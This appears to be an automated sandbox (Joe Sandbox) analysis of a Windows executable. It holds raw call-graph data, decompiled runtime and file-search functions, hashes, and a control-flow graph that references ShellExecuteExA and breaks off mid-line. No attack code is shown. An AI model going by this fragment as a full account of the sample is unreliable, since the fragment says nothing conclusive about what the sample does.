40ddc1 15055->14780 15056->15055 15057 4076d5 30 API calls 15056->15057 15059 40dde7 ctype 15057->15059 15058 40decb 15060 403a9c ctype 29 API calls 15058->15060 15059->15058 15061 40ded0 15059->15061 15064 406505 15059->15064 15060->15055 15062 4065b2 3 API calls 15061->15062 15062->15058 15065 405ba8 ReadFile 15064->15065 15066 40651d 15065->15066 15067 406534 GetLastError 15066->15067 15068 406530 15067->15068 15068->15059 15070 40ba66 15069->15070 15072 40ba9e 15070->15072 15073 403a9c ctype 29 API calls 15070->15073 15074 40a011 15070->15074 15072->14791 15073->15070 15075 40a01b __EH_prolog 15074->15075 15076 4042ad ctype 34 API calls 15075->15076 15077 40a036 15076->15077 15078 4042ad ctype 34 API calls 15077->15078 15079 40a045 15078->15079 15080 4042d6 ctype 34 API calls 15079->15080 15081 40a05f 15080->15081 15082 4042ad ctype 34 API calls 15081->15082 15083 40a06a 15082->15083 15084 4042d6 ctype 34 API calls 15083->15084 15085 40a081 15084->15085 15086 4042ad ctype 34 API calls 15085->15086 15087 40a08c 15086->15087 15092 407868 15087->15092 15093 407880 15092->15093 15094 407887 15092->15094 15095 413260 SetEvent GetLastError 15093->15095 15096 407891 15094->15096 15097 407896 15094->15097 15095->15094 15098 413210 WaitForSingleObject 15096->15098 15099 4131e0 ctype CloseHandle GetLastError 15097->15099 15098->15097 15100 40789d 15099->15100 15101 4131e0 ctype CloseHandle GetLastError 15100->15101 15102 4078a5 15101->15102 15105 407ddf __EH_prolog 15103->15105 15104 407eb5 15106 407ebe 15104->15106 15107 407ecf 15104->15107 15108 401e19 30 API calls 15105->15108 15114 407e63 15105->15114 15128 407cd4 15106->15128 15111 402634 30 API calls 15107->15111 15109 407e1b 15108->15109 15113 403b4f ctype 5 API calls 15109->15113 15112 407da4 15111->15112 15112->14797 15116 407e28 15113->15116 15114->15104 15115 407e8e 15114->15115 15117 401e3a 30 API calls 15115->15117 15118 403a9c ctype 29 API calls 15116->15118 15119 407e9a 15117->15119 15120 407e39 15118->15120 15121 402634 30 API calls 15119->15121 15120->15114 15122 407e3e 15120->15122 15123 407e5e 15121->15123 15124 401e3a 30 API calls 15122->15124 15126 403a9c ctype 29 API calls 15123->15126 15125 407e4a 15124->15125 15127 402634 30 API calls 15125->15127 15126->15112 15127->15123 15129 407cde __EH_prolog 15128->15129 15130 401ce1 30 API calls 15129->15130 15131 407cf1 15130->15131 15132 407d25 30 API calls 15131->15132 15133 407d00 15132->15133 15134 401ce1 30 API calls 15133->15134 15135 407d0b 15134->15135 15136 403a9c ctype 29 API calls 15135->15136 15137 407d13 15136->15137 15137->15112 15139 402170 30 API calls 15138->15139 15140 405925 15139->15140 15140->14579 15142 4049ab 15141->15142 15143 4049cd CreateDirectoryW 15141->15143 15144 4048ff 32 API calls 15142->15144 15143->14326 15145 4049b6 15144->15145 15150 40498d CreateDirectoryA 15145->15150 15147 4049bd 15148 403a9c ctype 29 API calls 15147->15148 15149 4049c7 15148->15149 15149->14326 15150->15147 15152 40c38a __EH_prolog 15151->15152 15153 4042d6 ctype 34 API calls 15152->15153 15162 40c763 15161->15162 15291 40c902 15162->15291 15166 40ad23 __EH_prolog 15165->15166 15487 40d7cc 15166->15487 15278 40c5f2 __EH_prolog 15277->15278 15279 403a76 30 API calls 15278->15279 15280 40c62a 15279->15280 15280->14359 15757 40c318 __EH_prolog 15756->15757 15758 40c366 15757->15758 15759 404327 30 API calls 15757->15759 15758->14405 15760 40c35d 15759->15760 15763 40c290 15762->15763 15765 40c296 15762->15765 15763->14405 15765->15763 15766 413d3d RaiseException 15765->15766 15766->15763 15768 409500 __EH_prolog 15767->15768 15769 401ce1 30 API calls 15768->15769 15770 409513 15769->15770 15771 401c80 30 API calls 15770->15771 15772 409524 15771->15772 15773 401e56 30 API calls 15772->15773 15774 409537 15773->15774 15775 403a9c ctype 29 API calls 15774->15775 15776 409543 15775->15776 15777 401ce1 30 API calls 15776->15777 15778 40954f 15777->15778 15779 403a9c ctype 29 API calls 15778->15779 15782 403426 __EH_prolog 15781->15782 15783 4042d6 ctype 34 API calls 15782->15783 15784 403452 15783->15784 15785 4042ad ctype 34 API calls 15784->15785 15786 40345d 15785->15786 15787 4042d6 ctype 34 API calls 15786->15787 15788 403471 15787->15788 15789 4042ad ctype 34 API calls 15788->15789 15790 40347c 15789->15790 15790->14205 15792 4035b0 __EH_prolog 15791->15792 15793 402170 30 API calls 15792->15793 15794 4035dd 15793->15794 15801 403664 15794->15801 15798 403614 15799 403570 15798->15799 15808 413d3d RaiseException 15798->15808 15799->14221 15809 413310 InitializeCriticalSection 15801->15809 15803 4035f1 15804 4132a0 CreateEventA 15803->15804 15805 4132c1 GetLastError 15804->15805 15806 4132be 15804->15806 15807 4132cb 15805->15807 15806->15798 15807->15798 15808->15799 15809->15803 15811 416efc 30 API calls 15810->15811 15813 4148ce 15811->15813 15812 414911 15814 413f9f ctype 29 API calls 15812->15814 15813->15812 15816 4148dc CreateThread 15813->15816 15815 414917 15814->15815 15817 413239 15815->15817 15820 416e77 15815->15820 15816->15817 15818 414909 GetLastError 15816->15818 15817->14226 15817->14227 15818->15812 15837 416ef3 15820->15837 15823 416eb0 15825 416eea 35 API calls 15823->15825 15824 416e99 15826 416ec0 15824->15826 15828 416ea3 15824->15828 15827 416eb5 15825->15827 15829 416edd 15826->15829 15832 416ed0 15826->15832 15827->15817 15831 416eea 35 API calls 15828->15831 15830 416eea 35 API calls 15829->15830 15833 416ee2 15830->15833 15834 416ea8 15831->15834 15835 416eea 35 API calls 15832->15835 15833->15817 15834->15817 15836 416ed5 15835->15836 15836->15817 15838 415523 35 API calls 15837->15838 15839 416e7d 15838->15839 15839->15823 15839->15824 15841 406215 __EH_prolog 15840->15841 15842 406240 15841->15842 15843 406226 DialogBoxParamW 15841->15843 15844 40243e 30 API calls 15842->15844 15850 4030ca 15843->15850 15845 406253 15844->15845 15846 40629a DialogBoxParamA 15845->15846 15847 401c80 30 API calls 15845->15847 15848 403a9c ctype 29 API calls 15846->15848 15849 406269 15847->15849 15848->15850 15851 401a18 31 API calls 15849->15851 15859 413210 WaitForSingleObject 15850->15859 15852 406278 15851->15852 15853 4052f9 30 API calls 15852->15853 15854 406285 15853->15854 15855 403a9c ctype 29 API calls 15854->15855 15856 40628d 15855->15856 15857 403a9c ctype 29 API calls 15856->15857 15858 406295 15857->15858 15858->15846 15859->14240 15861 406053 __EH_prolog 15860->15861 15862 406074 15861->15862 15863 406065 SetWindowTextW 15861->15863 15864 401c80 30 API calls 15862->15864 15871 4030ed 15863->15871 15865 40607c 15864->15865 15866 403d04 31 API calls 15865->15866 15867 40608b SetWindowTextA 15866->15867 15868 403a9c ctype 29 API calls 15867->15868 15869 4060a1 15868->15869 15870 403a9c ctype 29 API calls 15869->15870 15870->15871 15871->14245 15873 4023a8 15872->15873 15875 4023c1 15873->15875 15876 402559 15873->15876 15875->13699 15877 402569 15876->15877 15878 4021c4 30 API calls 15877->15878 15879 402577 ctype 15878->15879 15879->15875 15881 403f46 __EH_prolog 15880->15881 15882 40243e 30 API calls 15881->15882 15883 403f69 15882->15883 15884 403f9a 15883->15884 15886 401ee5 30 API calls 15883->15886 15885 403d24 30 API calls 15884->15885 15887 403fa6 15885->15887 15886->15883 15888 403a9c ctype 29 API calls 15887->15888 15889 403fae 15888->15889 15889->13737 15891 4040c8 __EH_prolog 15890->15891 15892 403a76 30 API calls 15891->15892 15893 4040d4 15892->15893 15894 4040fe 15893->15894 15895 401ce1 30 API calls 15893->15895 15896 4039df 30 API calls 15894->15896 15897 4040ee 15895->15897 15898 40410f 15896->15898 15899 401ce1 30 API calls 15897->15899 15898->13737 15899->15894 15901 403a9c ctype 29 API calls 15900->15901 15902 40214a 15901->15902 15903 403a9c ctype 29 API calls 15902->15903 15904 402151 15903->15904 15904->13737 15906 405f68 __EH_prolog 15905->15906 15907 405ff8 15906->15907 15908 405f7f 15906->15908 15921 405ebc 15907->15921 15910 402170 30 API calls 15908->15910 15912 405f93 15910->15912 15914 405fb2 LoadStringW 15912->15914 15915 402170 30 API calls 15912->15915 15913 401a03 31 API calls 15920 405ff3 15913->15920 15914->15912 15917 405fcb 15914->15917 15915->15914 15916 403a9c ctype 29 API calls 15919 4015a2 15916->15919 15917->15917 15918 401ce1 30 API calls 15917->15918 15918->15920 15919->13214 15920->15916 15922 405ec6 __EH_prolog 15921->15922 15923 40243e 30 API calls 15922->15923 15924 405ee9 15923->15924 15925 405f08 LoadStringA 15924->15925 15926 40243e 30 API calls 15924->15926 15925->15924 15927 405f21 15925->15927 15926->15925 15928 403d24 30 API calls 15927->15928 15929 405f42 15928->15929 15930 403a9c ctype 29 API calls 15929->15930 15931 405f4a 15930->15931 15931->15913 15968 404c54 __EH_prolog 15967->15968 15969 404d51 30 API calls 15968->15969 15970 404c64 15969->15970 16003 405468 15970->16003 15973 405468 30 API calls 15974 404c86 15973->15974 15975 403d24 30 API calls 15974->15975 15976 404c97 15975->15976 15977 403a9c ctype 29 API calls 15976->15977 15983 404ca3 15977->15983 15979 404cfe 15980 403a9c ctype 29 API calls 15979->15980 15982 404d0a 15980->15982 15981 403d24 30 API calls 15981->15983 15984 40551a FindClose 15982->15984 15983->15979 15983->15981 15988 404cd3 15983->15988 16013 405949 15983->16013 16017 404d6c 15983->16017 15986 404d13 15984->15986 16032 40489c SetFileAttributesA 15986->16032 15990 403a9c ctype 29 API calls 15988->15990 15989 404d1c 15991 404d27 15989->15991 16033 4048aa RemoveDirectoryA 15989->16033 15992 404cdf 15990->15992 15995 403a9c ctype 29 API calls 15991->15995 15994 40551a FindClose 15992->15994 15996 404ce8 15994->15996 15997 404d31 15995->15997 15998 403a9c ctype 29 API calls 15996->15998 15999 403a9c ctype 29 API calls 15997->15999 16000 404cf0 15998->16000 16001 401a41 15999->16001 16002 403a9c ctype 29 API calls 16000->16002 16001->13236 16002->16001 16004 405472 __EH_prolog 16003->16004 16005 403d24 30 API calls 16004->16005 16006 405485 16005->16006 16007 401ee5 30 API calls 16006->16007 16008 405494 16007->16008 16009 403d24 30 API calls 16008->16009 16010 40549f 16009->16010 16011 403a9c ctype 29 API calls 16010->16011 16012 404c75 16011->16012 16012->15973 16016 405951 16013->16016 16015 40596a 16015->15983 16016->16015 16034 405929 16016->16034 16018 404d76 __EH_prolog 16017->16018 16019 404d88 16018->16019 16020 404da9 16018->16020 16044 405417 16019->16044 16022 405417 30 API calls 16020->16022 16024 404db8 16022->16024 16026 404bdc 2 API calls 16024->16026 16027 404da2 16026->16027 16028 403a9c ctype 29 API calls 16027->16028 16029 404dc9 16028->16029 16030 403a9c ctype 29 API calls 16029->16030 16031 404dd1 16030->16031 16031->15983 16032->15989 16033->15991 16035 405939 16034->16035 16036 40592e 16034->16036 16038 40553a 32 API calls 16035->16038 16040 4057cf FindNextFileA 16036->16040 16039 405937 16038->16039 16039->16016 16041 4057f1 16040->16041 16042 4057ff 16040->16042 16043 40557f 30 API calls 16041->16043 16042->16039 16043->16042 16045 405421 __EH_prolog 16044->16045 16046 403d24 30 API calls 16045->16046 16047 405434 16046->16047 16054 4054b9 16047->16054 16050 403d24 30 API calls 16051 40544e 16050->16051 16055 40248c 30 API calls 16054->16055 16056 405443 16055->16056 16056->16050 16066 416d5d 16057->16066 16060 416cc9 GetCurrentProcess TerminateProcess 16061 416cda 16060->16061 16062 416d44 16061->16062 16063 416d4b ExitProcess 16061->16063 16069 416d66 16062->16069 16067 41570a ctype 29 API calls 16066->16067 16068 416cbe 16067->16068 16068->16060 16068->16061 16072 41576b LeaveCriticalSection 16069->16072 16071 414bed 16071->13392 16072->16071 16073 416cb8 16074 416d5d 29 API calls 16073->16074 16075 416cbe 16074->16075 16076 416cc9 GetCurrentProcess TerminateProcess 16075->16076 16077 416cda 16075->16077 16076->16077 16078 416d44 16077->16078 16079 416d4b ExitProcess 16077->16079 16080 416d66 LeaveCriticalSection 16078->16080 16081 416d49 16080->16081 16082 41584a SetUnhandledExceptionFilter 16083 40b8bb 16084 40b8c8 16083->16084 16085 40b8d9 16083->16085 16084->16085 16089 40b8fa 16084->16089 16088 403a9c ctype 29 API calls 16088->16085 16090 40b904 __EH_prolog 16089->16090 16091 4042d6 ctype 34 API calls 16090->16091 16092 40b928 16091->16092 16093 4042ad ctype 34 API calls 16092->16093 16094 40b933 16093->16094 16095 4042d6 ctype 34 API calls 16094->16095 16096 40b94a 16095->16096 16097 4042ad ctype 34 API calls 16096->16097 16098 40b955 16097->16098 16099 4099bc 34 API calls 16098->16099 16100 40b8d3 16099->16100 16100->16088

                              Executed Functions

                              Function 00414B04 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 83%
                              			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				signed int _t27;
				intOrPtr _t29;
				signed int _t35;
				intOrPtr _t52;

				_t47 = __edi;
				_push(0xffffffff);
				_push(0x41b9e0);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(__edi);
				_v28 = _t52 - 0x58;
				_t15 = GetVersion();
				 *0x4233d0 = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x4233cc = _t35;
				 *0x4233c8 = _t35 << 8;
				 *0x4233c4 = _t15 >> 0x10;
				if(E004159F8(_t35 << 8, 1) == 0) {
					E00414C31(0x1c);
				}
				if(E004154BC() == 0) {
					E00414C31(0x10);
				}
				_v8 = 0;
				E00417641();
				 *0x425a3c = GetCommandLineA();
				 *0x423340 = E0041750F();
				E004172C2();
				E00417209();
				E00416C69();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E004171B1();
				_t56 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_t29 = E00401014(_t56, GetModuleHandleA(0), 0, _v104, _t27); // executed
				_v100 = _t29;
				E00416C96(_t29);
				_v108 =  *((intOrPtr*)( *_v24));
				return E00417039(_t47, _t56,  *((intOrPtr*)( *_v24)), _v24);
			}















                              0x00414b04
                              0x00414b07
                              0x00414b09
                              0x00414b0e
                              0x00414b19
                              0x00414b1a
                              0x00414b26
                              0x00414b27
                              0x00414b2a
                              0x00414b34
                              0x00414b3c
                              0x00414b42
                              0x00414b4d
                              0x00414b56
                              0x00414b65
                              0x00414b69
                              0x00414b6e
                              0x00414b76
                              0x00414b7a
                              0x00414b7f
                              0x00414b82
                              0x00414b85
                              0x00414b90
                              0x00414b9a
                              0x00414b9f
                              0x00414ba4
                              0x00414ba9
                              0x00414bae
                              0x00414bb5
                              0x00414bc0
                              0x00414bc3
                              0x00414bc7
                              0x00414bd1
                              0x00414bc9
                              0x00414bc9
                              0x00414bc9
                              0x00414bdf
                              0x00414be4
                              0x00414be8
                              0x00414bf4
                              0x00414c00

                              APIs
                              • GetVersion.KERNEL32 ref: 00414B2A
                                • Part of subcall function 004159F8: HeapCreate.KERNELBASE(00000000,00001000,00000000,00414B62,00000001), ref: 00415A09
                                • Part of subcall function 004159F8: HeapDestroy.KERNEL32 ref: 00415A48
                              • GetCommandLineA.KERNEL32 ref: 00414B8A
                              • GetStartupInfoA.KERNEL32(?), ref: 00414BB5
                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00414BD8
                                • Part of subcall function 00414C31: ExitProcess.KERNEL32 ref: 00414C4E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                              • String ID:
                              • API String ID: 2057626494-0
                              • Opcode ID: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction ID: b13fe99396feb2249fb7197ea22bdd2eb3a8d4431b5d50e9622b99800ed9eeb5
                              • Opcode Fuzzy Hash: e3a55e15dfbba78f576db0669a4780403b126b59620817d16bca0fbeb85d5517
                              • Instruction Fuzzy Hash: 0721D2B0A44705AFD718AFB6DC46BEE7BB8EF44714F10052FF9009A291DB3C85808A9C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004055DE Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              C-Code - Quality: 77%
                              			E004055DE(void** __ecx, void* __eflags) {
				signed int _t23;
				signed int _t25;
				void* _t36;
				void** _t51;
				void* _t53;

				E00413954(E004196AC, _t53);
				_t51 = __ecx;
				_t23 = E0040551A(__ecx);
				if(_t23 != 0) {
					if( *0x423148 == 0) {
						E00401C80(_t53 - 0x18,  *(_t53 + 8));
						 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
						_t25 = AreFileApisANSI();
						asm("sbb eax, eax");
						_push( ~_t25 + 1);
						 *_t51 = FindFirstFileA( *(E00403D04(_t53 - 0x24)), _t53 - 0x164);
						E00403A9C( *((intOrPtr*)(_t53 - 0x24)));
						 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
						E00403A9C( *((intOrPtr*)(_t53 - 0x18)));
						__eflags =  *_t51 - 0xffffffff;
						if(__eflags != 0) {
							E00405705(_t53 - 0x164,  *((intOrPtr*)(_t53 + 0xc)), __eflags);
						}
					} else {
						_t36 = FindFirstFileW( *(_t53 + 8), _t53 - 0x3b4); // executed
						_t61 = _t36 - 0xffffffff;
						 *_t51 = _t36;
						if(_t36 != 0xffffffff) {
							E004056A6(_t53 - 0x3b4,  *((intOrPtr*)(_t53 + 0xc)), _t61);
						}
					}
					_t23 = 0 |  *_t51 != 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t23;
			}








                              0x004055e3
                              0x004055ef
                              0x004055f1
                              0x004055f8
                              0x00405605
                              0x00405634
                              0x00405639
                              0x0040563d
                              0x00405645
                              0x0040564e
                              0x00405667
                              0x00405669
                              0x00405671
                              0x00405675
                              0x0040567a
                              0x0040567f
                              0x0040568a
                              0x0040568a
                              0x00405607
                              0x00405611
                              0x00405617
                              0x0040561a
                              0x0040561c
                              0x00405627
                              0x00405627
                              0x0040561c
                              0x00405694
                              0x00405694
                              0x0040569b
                              0x004056a3

                              APIs
                              • __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                              • AreFileApisANSI.KERNEL32(?), ref: 0040563D
                              • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040565E
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFind$First$ApisCloseH_prolog
                              • String ID:
                              • API String ID: 4121580741-0
                              • Opcode ID: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction ID: 53571c6d670a3437f98eaf3b47711b77fa147e423a783867877babb07b55427d
                              • Opcode Fuzzy Hash: fcb5256250039c908afd196fb8e76c17c38080862ebf91937f58451f3d562862
                              • Instruction Fuzzy Hash: AB21813180050ADFCF11EF60C8459EEBB75EF00329F10476AE4A5B61E1DB399A85CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040553A Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040553A(void** __ecx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t8;
				void** _t14;

				_t14 = __ecx;
				if(E0040551A(__ecx) == 0) {
					L2:
					return 0;
				}
				_t8 = FindFirstFileA(_a4,  &_v324); // executed
				 *_t14 = _t8;
				if(_t8 != 0xffffffff) {
					E0040557F( &_v324, _a8, __eflags);
					return 1;
				}
				goto L2;
			}






                              0x00405544
                              0x0040554d
                              0x00405566
                              0x00000000
                              0x00405566
                              0x00405559
                              0x00405562
                              0x00405564
                              0x00405573
                              0x00000000
                              0x00405578
                              0x00000000

                              APIs
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              • FindFirstFileA.KERNELBASE(?,?,000000FF), ref: 00405559
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction ID: 4d0f5172a85985fc9641596f45f8b0e99eb03685ed3a07152804d04183bf4296
                              • Opcode Fuzzy Hash: 4d5417fc6ca074e65557f02866c61fee52306747aaa4eef42dce5467d8724910
                              • Instruction Fuzzy Hash: 5DE0923040050876CB20BF35DC019EB776AEF11398F104276F955672E5D738D9468F98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041584A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041584A() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00415804); // executed
				 *0x4233b0 = _t1;
				return _t1;
			}




                              0x0041584f
                              0x00415855
                              0x0041585a

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00015804), ref: 0041584F
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction ID: 76677b13eed7a87b3dd700732a0fedcf1c6828d453a24416ba8446ce1f8cc847
                              • Opcode Fuzzy Hash: 606abe9215baac8c82b0634bac82feb5658c8fb73c9735c67e630ff6bf3afee2
                              • Instruction Fuzzy Hash: 6CA022F0280300CF8B00AF20AC082C03E30F28830330000B3B80080238CF380388CA2C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041585C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE ref: 00415861
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction ID: 9f5714f3741d262582d91aa49c58cb07bd20065c27159592644951a243d3f8b5
                              • Opcode Fuzzy Hash: 1d24ef28bc6494d4f32e17e582550bcecd4607126de7dd0e3447cde8bb60405a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401014 Relevance: 56.7, APIs: 12, Strings: 20, Instructions: 692windowsynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 401014-401124 call 401a51 call 402170 * 4 GetCommandLineW call 401c80 call 4038ee call 403a9c call 402170 call 4045e2 call 40235e call 402323 call 401c80 call 401e3a call 403b4f call 403a9c * 2 35 401126-401155 call 401e19 call 401d7a call 403a9c call 40235e call 402323 0->35 36 40115a-401184 call 40243e call 401af4 0->36 35->36 45 401186-401189 36->45 46 40119f-4011cb call 401c80 call 402170 36->46 48 401197-40119a 45->48 49 40118b-401192 call 411093 45->49 62 4014b1-4014d5 call 401ecd call 405298 46->62 63 4011d1-4011f7 call 402155 call 403d5a 46->63 53 4019c4-4019f7 call 403a9c * 6 48->53 49->48 109 4019fa 53->109 78 4014f0-4014fc call 403a76 62->78 79 4014d7-4014da 62->79 80 401212-4012a1 call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 401c80 call 404073 call 403a9c call 403b4f 63->80 81 4011f9-4011fc 63->81 99 401513 78->99 100 4014fe-401511 call 401f0d 78->100 85 4014e8-4014eb 79->85 86 4014dc-4014e3 call 411093 79->86 189 4012a3 80->189 190 4012a9-4012d1 call 401c80 call 404041 call 403a9c 80->190 82 40120a-40120d 81->82 83 4011fe-401205 call 411093 81->83 91 401333-401398 call 4042d6 call 4042ad call 403a9c * 8 82->91 83->82 94 401998-4019c1 call 401a2d call 403a9c * 3 85->94 86->85 91->109 94->53 106 401515-401517 99->106 100->106 112 401519-40151b 106->112 113 40151f-401528 call 408107 106->113 118 4019fc-401a00 109->118 112->113 125 40152a-401536 call 411093 113->125 126 40153b-401583 call 401a03 call 402170 call 402f15 113->126 140 40163e-401640 125->140 156 401585-401588 126->156 157 4015f9-401622 call 403a9c call 401ecd call 405033 SetCurrentDirectoryA 126->157 140->85 145 401646-40164c 140->145 145->85 161 4015f1-4015f4 156->161 162 40158a-40158d 156->162 196 401651-401654 157->196 197 401624-40163d SetCurrentDirectoryA call 403a9c * 2 157->197 166 4018b7-4018cb call 403a9c * 2 161->166 167 401594-4015b7 call 40602f call 401d7a call 403a9c 162->167 168 40158f-401592 162->168 200 4018d3-401935 call 401a2d call 403a9c * 9 166->200 201 4018cd-4018cf 166->201 169 4015bc-4015c1 167->169 168->167 168->169 169->161 178 4015c3-4015c6 169->178 178->161 184 4015c8-4015f0 call 40602f MessageBoxW call 403a9c 178->184 184->161 189->190 235 4012d3-4012e6 call 401d7a 190->235 236 4012eb-4012ee 190->236 202 40165a-401691 call 401a18 196->202 203 40172c-40172f 196->203 197->140 200->118 201->200 222 401693-40169a call 401de3 202->222 223 40169f-4016e4 call 401a18 ShellExecuteExA 202->223 211 401731-40176b call 401d1b call 